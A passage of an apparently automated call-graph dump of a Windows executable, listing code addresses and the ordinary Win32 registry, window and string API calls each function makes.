51126->51127 51132 403420 4 API calls 51127->51132 51198 469ca4 43 API calls 51129->51198 51134 403400 4 API calls 51130->51134 51135 403494 4 API calls 51131->51135 51137 46ac91 51132->51137 51133->51122 51138 46a9cf 51133->51138 51139 46a900 51134->51139 51136 46a8d8 51135->51136 51189 47c26c 51136->51189 51137->50558 51143 403494 4 API calls 51138->51143 51192 469b5c 51139->51192 51147 46a9dd 51143->51147 51145 46aa39 51154 46aa44 51145->51154 51155 46aa9a 51145->51155 51146 46a8f0 51149 403634 4 API calls 51146->51149 51150 414ae8 4 API calls 51147->51150 51149->51139 51152 46a9fe 51150->51152 51156 403634 4 API calls 51152->51156 51153 46a929 51159 46a934 51153->51159 51160 46a98a 51153->51160 51158 403494 4 API calls 51154->51158 51157 403400 4 API calls 51155->51157 51156->51129 51163 46aaa2 51157->51163 51165 46aa52 51158->51165 51162 403494 4 API calls 51159->51162 51161 403400 4 API calls 51160->51161 51161->51133 51167 46a942 51162->51167 51175 46ab4b 51163->51175 51199 494c90 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51163->51199 51165->51163 51169 403634 4 API calls 51165->51169 51171 46aa98 51165->51171 51166 46aac5 51166->51175 51200 494f3c 18 API calls 51166->51200 51167->51133 51170 403634 4 API calls 51167->51170 51169->51165 51170->51167 51171->51163 51173 46abec 51202 429144 SendMessageA SendMessageA 51173->51202 51201 4290f4 SendMessageA 51175->51201 51176->50559 51178 40363c 51177->51178 51179 4034bc 4 API calls 51178->51179 51180 40364f 51179->51180 51181 403450 4 API calls 51180->51181 51182 403677 51181->51182 51205 42a040 SendMessageA 51183->51205 51185 469877 51186 469897 51185->51186 51206 42a040 SendMessageA 51185->51206 51186->51125 51188 469887 51188->51125 51207 47c2b4 51189->51207 51196 469b89 51192->51196 51193 469beb 51194 403400 4 API calls 51193->51194 51195 469c00 51194->51195 51195->51153 51196->51193 51552 469ae0 43 API calls 51196->51552 51198->51145 51199->51166 51200->51175 51201->51173 51202->51092 51203->51114 
51204->51114 51205->51185 51206->51188 51208 403494 4 API calls 51207->51208 51215 47c2e7 51208->51215 51209 47c3f9 51210 403420 4 API calls 51209->51210 51211 47c289 51210->51211 51211->51146 51213 403778 4 API calls 51213->51215 51215->51209 51215->51213 51218 4037b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51215->51218 51219 47b100 51215->51219 51463 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51215->51463 51464 403800 51215->51464 51468 42c97c CharPrevA 51215->51468 51218->51215 51220 47b152 51219->51220 51221 47b130 51219->51221 51222 47b172 51220->51222 51223 47b160 51220->51223 51221->51220 51473 47a030 19 API calls 51221->51473 51226 47b1d5 51222->51226 51227 47b180 51222->51227 51224 403494 4 API calls 51223->51224 51278 47b16d 51224->51278 51236 47b1f6 51226->51236 51237 47b1e3 51226->51237 51229 47b1af 51227->51229 51230 47b189 51227->51230 51228 403400 4 API calls 51231 47baf8 51228->51231 51233 47b1c2 51229->51233 51475 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51229->51475 51232 47b19c 51230->51232 51474 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51230->51474 51235 403400 4 API calls 51231->51235 51239 403494 4 API calls 51232->51239 51234 403494 4 API calls 51233->51234 51234->51278 51241 47bb00 51235->51241 51243 47b217 51236->51243 51244 47b204 51236->51244 51242 403494 4 API calls 51237->51242 51239->51278 51241->51215 51242->51278 51246 47b267 51243->51246 51247 47b225 51243->51247 51245 403494 4 API calls 51244->51245 51245->51278 51254 47b275 51246->51254 51255 47b288 51246->51255 51248 47b241 51247->51248 51249 47b22e 51247->51249 51251 47b254 51248->51251 51476 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51248->51476 51250 403494 4 API calls 51249->51250 51250->51278 51253 403494 4 API calls 51251->51253 51253->51278 51256 403494 4 API calls 51254->51256 51257 47b296 51255->51257 51258 47b2a9 51255->51258 51256->51278 51259 403494 4 API calls 51257->51259 51260 47b2b7 51258->51260 51261 47b2ca 
51258->51261 51259->51278 51262 403494 4 API calls 51260->51262 51263 47b2eb 51261->51263 51264 47b2d8 51261->51264 51262->51278 51266 47b327 51263->51266 51267 47b2f9 51263->51267 51265 403494 4 API calls 51264->51265 51265->51278 51272 47b335 51266->51272 51277 47b364 51266->51277 51268 47b315 51267->51268 51269 47b302 51267->51269 51271 47c26c 43 API calls 51268->51271 51270 403494 4 API calls 51269->51270 51270->51278 51271->51278 51273 47b351 51272->51273 51274 47b33e 51272->51274 51276 403494 4 API calls 51273->51276 51275 403494 4 API calls 51274->51275 51275->51278 51276->51278 51279 47b372 51277->51279 51280 47b3a0 51277->51280 51278->51228 51281 47b38e 51279->51281 51282 47b37b 51279->51282 51285 47b3ae 51280->51285 51286 47b3dd 51280->51286 51463->51215 51465 40382f 51464->51465 51466 403804 51464->51466 51465->51215 51467 4038a4 4 API calls 51466->51467 51467->51465 51468->51215 51473->51221 51474->51232 51475->51233 51476->51251 51552->51196 51554 47dd56 51553->51554 51555 47dd19 51553->51555 51554->50565 51585 455d0c 51555->51585 51559 47dd6d 51559->50565 51704 466714 51560->51704 51563->50573 51565 42f56c 51564->51565 51566 42f58f GetActiveWindow GetFocus 51565->51566 51567 41eea4 2 API calls 51566->51567 51568 42f5a6 51567->51568 51569 42f5c3 51568->51569 51570 42f5b3 RegisterClassA 51568->51570 51571 42f652 SetFocus 51569->51571 51572 42f5d1 CreateWindowExA 51569->51572 51570->51569 51573 403400 4 API calls 51571->51573 51572->51571 51574 42f604 51572->51574 51575 42f66e 51573->51575 51735 42427c 51574->51735 51580 494f3c 18 API calls 51575->51580 51577 42f62c 51578 42f634 CreateWindowExA 51577->51578 51578->51571 51579 42f64a ShowWindow 51578->51579 51579->51571 51580->50611 51741 44b514 51581->51741 51586 455d1d 51585->51586 51587 455d21 51586->51587 51588 455d2a 51586->51588 51611 455a10 51587->51611 51619 455af0 29 API calls 51588->51619 51591 455d27 51591->51554 51592 47d970 51591->51592 51597 47da6c 51592->51597 51599 47d9b0 51592->51599 
51593 403420 4 API calls 51594 47db4f 51593->51594 51594->51559 51604 47dabd 51597->51604 51607 47da0f 51597->51607 51674 479630 51597->51674 51599->51597 51600 47da18 51599->51600 51603 47c26c 43 API calls 51599->51603 51599->51607 51648 479770 51599->51648 51659 4798d4 51599->51659 51600->51599 51605 47c26c 43 API calls 51600->51605 51610 47da59 51600->51610 51663 42c92c 51600->51663 51668 42c954 51600->51668 51673 47d67c 52 API calls 51600->51673 51601 47c26c 43 API calls 51601->51604 51602 454100 20 API calls 51602->51604 51603->51599 51604->51597 51604->51601 51604->51602 51604->51610 51605->51600 51607->51593 51610->51607 51620 42de1c 51611->51620 51613 455a2d 51614 455a7b 51613->51614 51623 455944 51613->51623 51614->51591 51617 455944 6 API calls 51618 455a5c RegCloseKey 51617->51618 51618->51591 51619->51591 51621 42de27 51620->51621 51622 42de2d RegOpenKeyExA 51620->51622 51621->51622 51622->51613 51628 42dd58 51623->51628 51625 45596c 51626 403420 4 API calls 51625->51626 51627 4559f6 51626->51627 51627->51617 51631 42dc00 51628->51631 51632 42dc26 RegQueryValueExA 51631->51632 51637 42dc49 51632->51637 51647 42dc6b 51632->51647 51633 403400 4 API calls 51635 42dd37 51633->51635 51634 42dc63 51636 403400 4 API calls 51634->51636 51635->51625 51636->51647 51637->51634 51638 4034e0 4 API calls 51637->51638 51639 403744 4 API calls 51637->51639 51637->51647 51638->51637 51640 42dca0 RegQueryValueExA 51639->51640 51640->51632 51641 42dcbc 51640->51641 51642 4038a4 4 API calls 51641->51642 51641->51647 51643 42dcfe 51642->51643 51644 42dd10 51643->51644 51646 403744 4 API calls 51643->51646 51645 403450 4 API calls 51644->51645 51645->51647 51646->51644 51647->51633 51649 479786 51648->51649 51650 479782 51648->51650 51651 403450 4 API calls 51649->51651 51650->51599 51652 479793 51651->51652 51653 4797b3 51652->51653 51654 479799 51652->51654 51656 479630 19 API calls 51653->51656 51655 479630 19 API calls 51654->51655 51657 4797af 51655->51657 51656->51657 
51658 403400 4 API calls 51657->51658 51658->51650 51661 4798e0 51659->51661 51660 4798fb 51660->51599 51661->51660 51686 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51661->51686 51687 42c79c 51663->51687 51666 403778 4 API calls 51667 42c94e 51666->51667 51667->51600 51669 42c79c IsDBCSLeadByte 51668->51669 51670 42c964 51669->51670 51671 403778 4 API calls 51670->51671 51672 42c975 51671->51672 51672->51600 51673->51600 51675 47964b 51674->51675 51678 47967c 51675->51678 51685 47970a 51675->51685 51699 4794e4 19 API calls 51675->51699 51676 4796a1 51682 4796c2 51676->51682 51701 4794e4 19 API calls 51676->51701 51678->51676 51700 4794e4 19 API calls 51678->51700 51681 479702 51693 479368 51681->51693 51682->51681 51682->51685 51702 453344 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51682->51702 51685->51597 51686->51660 51688 42c67c IsDBCSLeadByte 51687->51688 51690 42c7b1 51688->51690 51689 42c7fb 51689->51666 51690->51689 51692 42c444 IsDBCSLeadByte 51690->51692 51692->51690 51694 4793a3 51693->51694 51695 403450 4 API calls 51694->51695 51696 4793c8 51695->51696 51703 477a58 19 API calls 51696->51703 51698 479409 51698->51685 51699->51678 51700->51676 51701->51682 51702->51681 51703->51698 51705 403494 4 API calls 51704->51705 51706 466742 51705->51706 51721 42dbc8 51706->51721 51709 42dbc8 5 API calls 51710 466766 51709->51710 51711 466600 19 API calls 51710->51711 51712 466770 51711->51712 51713 42dbc8 5 API calls 51712->51713 51714 46677f 51713->51714 51724 466678 51714->51724 51717 42dbc8 5 API calls 51718 466798 51717->51718 51719 403400 4 API calls 51718->51719 51720 4667ad 51719->51720 51720->50569 51728 42db10 51721->51728 51725 466698 51724->51725 51726 4078f4 19 API calls 51725->51726 51727 4666e2 51726->51727 51727->51717 51729 42dbbb 51728->51729 51730 42db30 51728->51730 51729->51709 51730->51729 51731 4037b8 4 API calls 51730->51731 51733 403800 4 API calls 51730->51733 51734 42c444 IsDBCSLeadByte 51730->51734 51731->51730 
51733->51730 51734->51730 51736 4242ae 51735->51736 51737 42428e GetWindowTextA 51735->51737 51739 403494 4 API calls 51736->51739 51738 4034e0 4 API calls 51737->51738 51740 4242ac 51738->51740 51739->51740 51740->51577 51744 44b38c 51741->51744 51745 44b3bf 51744->51745 51746 414ae8 4 API calls 51745->51746 51747 44b3d2 51746->51747 51748 44b3ff GetDC 51747->51748 51749 40357c 4 API calls 51747->51749 51755 41a1e8 51748->51755 51749->51748 51752 44b430 51763 44b0c0 51752->51763 51756 41a213 51755->51756 51757 41a2af 51755->51757 51774 403520 51756->51774 51758 403400 4 API calls 51757->51758 51759 41a2c7 SelectObject 51758->51759 51759->51752 51761 41a26b 51775 4034e0 4 API calls 51774->51775 51776 40352a 51775->51776 51776->51761 51780 4652d7 51777->51780 51778 4653b2 51788 46708c 51778->51788 51779 46536a 51779->51778 51806 4185b8 7 API calls 51779->51806 51780->51778 51783 465327 51780->51783 51800 421a1c 51780->51800 51783->51779 51784 465361 51783->51784 51785 46536c 51783->51785 51786 421a1c 7 API calls 51784->51786 51787 421a1c 7 API calls 51785->51787 51786->51779 51787->51779 51789 4670bc 51788->51789 51790 46709d 51788->51790 51789->50630 51791 414b18 4 API calls 51790->51791 51792 4670ab 51791->51792 51793 414b18 4 API calls 51792->51793 51793->51789 51801 421a74 51800->51801 51803 421a2a 51800->51803 51801->51783 51802 421a59 51802->51801 51815 421d28 SetFocus GetFocus 51802->51815 51803->51802 51807 408cbc 51803->51807 51806->51778 51808 408cc8 51807->51808 51816 406dec LoadStringA 51808->51816 51811 403450 4 API calls 51812 408cf9 51811->51812 51813 403400 4 API calls 51812->51813 51814 408d0e 51813->51814 51814->51802 51815->51801 51817 4034e0 4 API calls 51816->51817 51818 406e19 51817->51818 51818->51811 51867 46c7a5 51866->51867 51868 414ae8 4 API calls 51867->51868 51883 46c7f2 51867->51883 51869 46c7bb 51868->51869 52073 466924 6 API calls 51869->52073 51870 403420 4 API calls 51872 46c89c 51870->51872 51872->50710 52065 408be0 LocalAlloc 
TlsSetValue TlsGetValue TlsGetValue LoadStringA 51872->52065 51873 46c7c3 51874 414b18 4 API calls 51873->51874 51875 46c7d1 51874->51875 51876 46c7de 51875->51876 51878 46c7f7 51875->51878 52074 47efd0 42 API calls 51876->52074 51879 46c80f 51878->51879 51881 466a08 CharNextA 51878->51881 52075 47efd0 42 API calls 51879->52075 51882 46c80b 51881->51882 51882->51879 51884 46c825 51882->51884 51883->51870 51885 46c841 51884->51885 51886 46c82b 51884->51886 51888 42c99c CharNextA 51885->51888 52076 47efd0 42 API calls 51886->52076 51889 46c84e 51888->51889 51889->51883 52077 466a94 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 51889->52077 51891 46c865 51892 451458 4 API calls 51891->51892 51893 46c872 51892->51893 52078 47efd0 42 API calls 51893->52078 51896 4241ed SetActiveWindow 51895->51896 51900 424223 51895->51900 52079 42364c 51896->52079 51900->50722 51900->50723 51901 42420a 51901->51900 51902 42421d SetFocus 51901->51902 51902->51900 51904 482505 51903->51904 51905 4824d7 51903->51905 51907 475bd0 51904->51907 52092 494cec 18 API calls 51905->52092 52093 457d10 51907->52093 52066->50718 52073->51873 52074->51883 52075->51883 52076->51883 52077->51891 52078->51883 52088 4235f8 SystemParametersInfoA 52079->52088 52082 423665 ShowWindow 52084 423670 52082->52084 52085 423677 52082->52085 52091 423628 SystemParametersInfoA 52084->52091 52087 423b14 LocalAlloc TlsSetValue TlsGetValue TlsGetValue SetWindowPos 52085->52087 52087->51901 52089 423616 52088->52089 52089->52082 52090 423628 SystemParametersInfoA 52089->52090 52090->52082 52091->52085 52092->51904 52094 457e44 52093->52094 52095 457d3c 52093->52095 52096 457e95 52094->52096 52569 45757c 6 API calls 52094->52569 52565 457a0c GetSystemTimeAsFileTime FileTimeToSystemTime 52095->52565 52099 403400 4 API calls 52096->52099 52101 457eaa 52099->52101 52100 457d44 52102 4078f4 19 API calls 52100->52102 52114 4072a8 52101->52114 52103 457db5 52102->52103 52566 457d00 20 API calls 52103->52566 52105 403778 4 
API calls 52109 457dbd 52105->52109 52109->52105 52115 403738 52114->52115 52116 4072b2 SetCurrentDirectoryA 52115->52116 52565->52100 52566->52109 52569->52096 53758 431eec 53719->53758 53721 43d9f2 53722 403400 4 API calls 53721->53722 53723 43da76 53722->53723 53723->50779 53723->50780 53725 431bd6 53724->53725 53726 402648 4 API calls 53725->53726 53727 431c06 53726->53727 53728 4947f8 53727->53728 53729 4948cd 53728->53729 53730 494812 53728->53730 53735 494910 53729->53735 53730->53729 53732 433d6c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53730->53732 53734 403450 4 API calls 53730->53734 53763 408c0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53730->53763 53764 431ca0 53730->53764 53732->53730 53734->53730 53736 49492c 53735->53736 53772 433d6c 53736->53772 53738 494931 53739 431ca0 4 API calls 53738->53739 53740 49493c 53739->53740 53741 43d594 53740->53741 53742 43d5c1 53741->53742 53743 43d5b3 53741->53743 53742->50790 53743->53742 53744 43d63d 53743->53744 53748 447084 4 API calls 53743->53748 53751 43d6f7 53744->53751 53775 447084 53744->53775 53746 43d688 53781 43dd50 53746->53781 53748->53743 53749 43d8fd 53749->53742 53801 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53749->53801 53751->53749 53752 43d8de 53751->53752 53799 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53751->53799 53800 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53752->53800 53755->50792 53756->50794 53757->50781 53759 403494 4 API calls 53758->53759 53761 431efb 53759->53761 53760 431f25 53760->53721 53761->53760 53762 403744 4 API calls 53761->53762 53762->53761 53763->53730 53765 431cc0 53764->53765 53766 431cae 53764->53766 53768 431ce2 53765->53768 53771 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53765->53771 53770 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53766->53770 53768->53730 53770->53765 53771->53768 53773 402648 4 API calls 53772->53773 53774 433d7b 53773->53774 53774->53738 53776 4470a3 53775->53776 53777 
4470aa 53775->53777 53802 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53776->53802 53779 431ca0 4 API calls 53777->53779 53780 4470ba 53779->53780 53780->53746 53782 43dd6c 53781->53782 53787 43dd99 53781->53787 53783 402660 4 API calls 53782->53783 53782->53787 53783->53782 53784 43ddce 53784->53751 53786 43fea5 53786->53784 53812 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53786->53812 53787->53784 53787->53786 53788 43c938 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53788 53790 433b18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53790 53793 446e30 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53793 53795 433d18 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53795 53796 436650 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53796 53797 431c40 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53797 53798 447024 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53798 53803 4396e0 53787->53803 53809 436e4c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53809 53810 43dc48 18 API calls 53787->53810 53811 433d34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 53787->53811 53788->53787 53790->53787 53793->53787 53795->53787 53796->53787 53797->53787 53798->53787 53799->53751 53800->53749 53801->53749 53802->53777 53804 4396e9 53803->53804 53805 403400 4 API calls 53804->53805 53809->53787 53810->53787 53811->53787 53812->53786 53815 41fb58 53816 41fb61 53815->53816 53819 41fdfc 53816->53819 53818 41fb6e 53820 41feee 53819->53820 53821 41fe13 53819->53821 53820->53818 53821->53820 53840 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53821->53840 53823 41fe49 53824 41fe73 53823->53824 53825 41fe4d 53823->53825 53850 41f9bc GetWindowLongA GetSystemMetrics GetSystemMetrics GetWindowLongA 53824->53850 53841 41fb9c 53825->53841 53829 41fe81 53831 41fe85 53829->53831 53832 41feab 53829->53832 53830 41fb9c 10 API calls 53839 41fe71 53830->53839 53833 41fb9c 10 API calls 
53831->53833 53834 41fb9c 10 API calls 53832->53834 53835 41fe97 53833->53835 53836 41febd 53834->53836 53838 41fb9c 10 API calls 53835->53838 53837 41fb9c 10 API calls 53836->53837 53837->53839 53838->53839 53839->53818 53840->53823 53842 41fbb7 53841->53842 53843 41fbcd 53842->53843 53844 41f93c 4 API calls 53842->53844 53851 41f93c 53843->53851 53844->53843 53846 41fc15 53847 41fc38 SetScrollInfo 53846->53847 53859 41fa9c 53847->53859 53850->53829 53852 4181e0 53851->53852 53853 41f959 GetWindowLongA 53852->53853 53854 41f996 53853->53854 53855 41f976 53853->53855 53871 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53854->53871 53870 41f8c8 GetWindowLongA GetSystemMetrics GetSystemMetrics 53855->53870 53858 41f982 53858->53846 53860 41faaa 53859->53860 53861 41fab2 53859->53861 53860->53830 53862 41faf1 53861->53862 53863 41fae1 53861->53863 53869 41faef 53861->53869 53873 417e48 IsWindowVisible ScrollWindow SetWindowPos 53862->53873 53872 417e48 IsWindowVisible ScrollWindow SetWindowPos 53863->53872 53864 41fb31 GetScrollPos 53864->53860 53867 41fb3c 53864->53867 53868 41fb4b SetScrollPos 53867->53868 53868->53860 53869->53864 53870->53858 53871->53858 53872->53869 53873->53869 53874 420598 53875 4205ab 53874->53875 53895 415b30 53875->53895 53877 4206f2 53878 420709 53877->53878 53902 4146d4 KiUserCallbackDispatcher 53877->53902 53882 420720 53878->53882 53903 414718 KiUserCallbackDispatcher 53878->53903 53879 420651 53900 420848 20 API calls 53879->53900 53880 4205e6 53880->53877 53880->53879 53888 420642 MulDiv 53880->53888 53884 420742 53882->53884 53904 420060 12 API calls 53882->53904 53886 42066a 53886->53877 53901 420060 12 API calls 53886->53901 53899 41a304 LocalAlloc TlsSetValue TlsGetValue TlsGetValue DeleteObject 53888->53899 53891 420687 53892 4206a3 MulDiv 53891->53892 53893 4206c6 53891->53893 53892->53893 53893->53877 53894 4206cf MulDiv 53893->53894 53894->53877 53896 415b42 53895->53896 53905 414470 53896->53905 53898 415b5a 
53898->53880 53899->53879 53900->53886 53901->53891 53902->53878 53903->53882 53904->53884 53906 41448a 53905->53906 53909 410458 53906->53909 53908 4144a0 53908->53898 53912 40dca4 53909->53912 53911 41045e 53911->53908 53913 40dd06 53912->53913 53914 40dcb7 53912->53914 53919 40dd14 53913->53919 53917 40dd14 19 API calls 53914->53917 53918 40dce1 53917->53918 53918->53911 53920 40dd24 53919->53920 53922 40dd3a 53920->53922 53931 40e09c 53920->53931 53947 40d5e0 53920->53947 53950 40df4c 53922->53950 53925 40d5e0 5 API calls 53926 40dd42 53925->53926 53926->53925 53927 40ddae 53926->53927 53953 40db60 53926->53953 53928 40df4c 5 API calls 53927->53928 53930 40dd10 53928->53930 53930->53911 53967 40e96c 53931->53967 53933 403778 4 API calls 53935 40e0d7 53933->53935 53934 40e18d 53936 40e1b7 53934->53936 53937 40e1a8 53934->53937 53935->53933 53935->53934 54030 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53935->54030 54031 40e080 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53935->54031 54027 40ba24 53936->54027 53976 40e3c0 53937->53976 53943 40e1b5 53944 403400 4 API calls 53943->53944 53945 40e25c 53944->53945 53945->53920 53948 40ea08 5 API calls 53947->53948 53949 40d5ea 53948->53949 53949->53920 54064 40d4bc 53950->54064 54073 40df54 53953->54073 53956 40e96c 5 API calls 53957 40db9e 53956->53957 53958 40e96c 5 API calls 53957->53958 53959 40dba9 53958->53959 53960 40dbc4 53959->53960 53961 40dbbb 53959->53961 53966 40dbc1 53959->53966 54080 40d9d8 53960->54080 54083 40dac8 19 API calls 53961->54083 53964 403420 4 API calls 53965 40dc8f 53964->53965 53965->53926 53966->53964 54033 40d780 53967->54033 53970 4034e0 4 API calls 53971 40e98f 53970->53971 53972 403744 4 API calls 53971->53972 53973 40e996 53972->53973 53974 40d780 5 API calls 53973->53974 53975 40e9a4 53974->53975 53975->53935 53977 40e3ec 53976->53977 53979 40e3f6 53976->53979 54038 40d440 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53977->54038 
53980 40e511 53979->53980 53981 40e495 53979->53981 53982 40e4f6 53979->53982 53983 40e576 53979->53983 53984 40e438 53979->53984 53985 40e4d9 53979->53985 53986 40e47a 53979->53986 53987 40e4bb 53979->53987 53998 40e45c 53979->53998 53990 40d764 5 API calls 53980->53990 54046 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53981->54046 54051 40e890 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53982->54051 53994 40d764 5 API calls 53983->53994 54039 40d764 53984->54039 54049 40e9a8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53985->54049 54045 40d818 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53986->54045 54048 40dde4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53987->54048 53999 40e519 53990->53999 53993 403400 4 API calls 54000 40e5eb 53993->54000 54001 40e57e 53994->54001 53997 40e4a0 54047 40d470 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 53997->54047 53998->53993 54007 40e523 53999->54007 54008 40e51d 53999->54008 54000->53943 54009 40e582 54001->54009 54010 40e59b 54001->54010 54002 40e4e4 54050 409d38 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54002->54050 54004 40e461 54044 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54004->54044 54005 40e444 54042 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54005->54042 54052 40ea08 54007->54052 54015 40e521 54008->54015 54016 40e53c 54008->54016 54018 40ea08 5 API calls 54009->54018 54058 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54010->54058 54056 40de24 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54015->54056 54019 40ea08 5 API calls 54016->54019 54018->53998 54021 40e544 54019->54021 54020 40e44f 54043 40e26c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54020->54043 54055 40d8a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54021->54055 54024 40e566 54057 40e2d4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 
54024->54057 54059 40b9d0 54027->54059 54030->53935 54031->53935 54032 40d774 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54032->53943 54035 40d78b 54033->54035 54034 40d7c5 54034->53970 54035->54034 54037 40d7cc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54035->54037 54037->54035 54038->53979 54040 40ea08 5 API calls 54039->54040 54041 40d76e 54040->54041 54041->54004 54041->54005 54042->54020 54043->53998 54044->53998 54045->53998 54046->53997 54047->53998 54048->53998 54049->54002 54050->53998 54051->53998 54053 40d780 5 API calls 54052->54053 54054 40ea15 54053->54054 54054->53998 54055->53998 54056->54024 54057->53998 54058->53998 54060 40b9e2 54059->54060 54061 40ba07 54059->54061 54060->54061 54063 40ba84 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54060->54063 54061->53943 54061->54032 54063->54061 54065 40ea08 5 API calls 54064->54065 54067 40d4c9 54065->54067 54066 40d4dc 54066->53926 54067->54066 54071 40eb0c LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54067->54071 54069 40d4d7 54072 40d458 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54069->54072 54071->54069 54072->54066 54074 40d764 5 API calls 54073->54074 54075 40df6b 54074->54075 54076 40ea08 5 API calls 54075->54076 54079 40db93 54075->54079 54077 40df78 54076->54077 54077->54079 54084 40ded8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 54077->54084 54079->53956 54085 40ab7c 19 API calls 54080->54085 54082 40da00 54082->53966 54083->53966 54084->54079 54085->54082 56290 41363c SetWindowLongA GetWindowLongA 56291 413699 SetPropA SetPropA 56290->56291 56292 41367b GetWindowLongA 56290->56292 56297 41f39c 56291->56297 56292->56291 56293 41368a SetWindowLongA 56292->56293 56293->56291 56302 415270 56297->56302 56309 423c0c 56297->56309 56403 423a84 56297->56403 56298 4136e9 56303 41527d 56302->56303 56304 4152e3 56303->56304 56305 4152d8 56303->56305 56308 4152e1 56303->56308 56410 424b8c 13 API calls 56304->56410 
56305->56308 56411 41505c 46 API calls 56305->56411 56308->56298 56312 423c42 56309->56312 56328 423c63 56312->56328 56412 423b68 56312->56412 56313 423cec 56315 423cf3 56313->56315 56316 423d27 56313->56316 56314 423c8d 56317 423c93 56314->56317 56318 423d50 56314->56318 56323 423cf9 56315->56323 56361 423fb1 56315->56361 56319 423d32 56316->56319 56320 42409a IsIconic 56316->56320 56324 423cc5 56317->56324 56325 423c98 56317->56325 56321 423d62 56318->56321 56322 423d6b 56318->56322 56326 4240d6 56319->56326 56327 423d3b 56319->56327 56320->56328 56332 4240ae GetFocus 56320->56332 56329 423d78 56321->56329 56330 423d69 56321->56330 56419 424194 11 API calls 56322->56419 56333 423f13 SendMessageA 56323->56333 56334 423d07 56323->56334 56324->56328 56352 423cde 56324->56352 56353 423e3f 56324->56353 56335 423df6 56325->56335 56336 423c9e 56325->56336 56433 424850 WinHelpA PostMessageA 56326->56433 56338 4240ed 56327->56338 56362 423cc0 56327->56362 56328->56298 56339 4241dc 11 API calls 56329->56339 56420 423b84 NtdllDefWindowProc_A 56330->56420 56332->56328 56340 4240bf 56332->56340 56333->56328 56334->56328 56334->56362 56383 423f56 56334->56383 56424 423b84 NtdllDefWindowProc_A 56335->56424 56341 423ca7 56336->56341 56342 423e1e PostMessageA 56336->56342 56350 4240f6 56338->56350 56351 42410b 56338->56351 56339->56328 56432 41eff4 GetCurrentThreadId EnumThreadWindows 56340->56432 56347 423cb0 56341->56347 56348 423ea5 56341->56348 56425 423b84 NtdllDefWindowProc_A 56342->56425 56356 423cb9 56347->56356 56357 423dce IsIconic 56347->56357 56358 423eae 56348->56358 56359 423edf 56348->56359 56349 423e39 56349->56328 56360 4244d4 5 API calls 56350->56360 56434 42452c LocalAlloc TlsSetValue TlsGetValue TlsGetValue SendMessageA 56351->56434 56352->56362 56363 423e0b 56352->56363 56416 423b84 NtdllDefWindowProc_A 56353->56416 56355 4240c6 56355->56328 56367 4240ce SetFocus 56355->56367 56356->56362 56368 423d91 56356->56368 56370 423dea 56357->56370 56371 423dde 
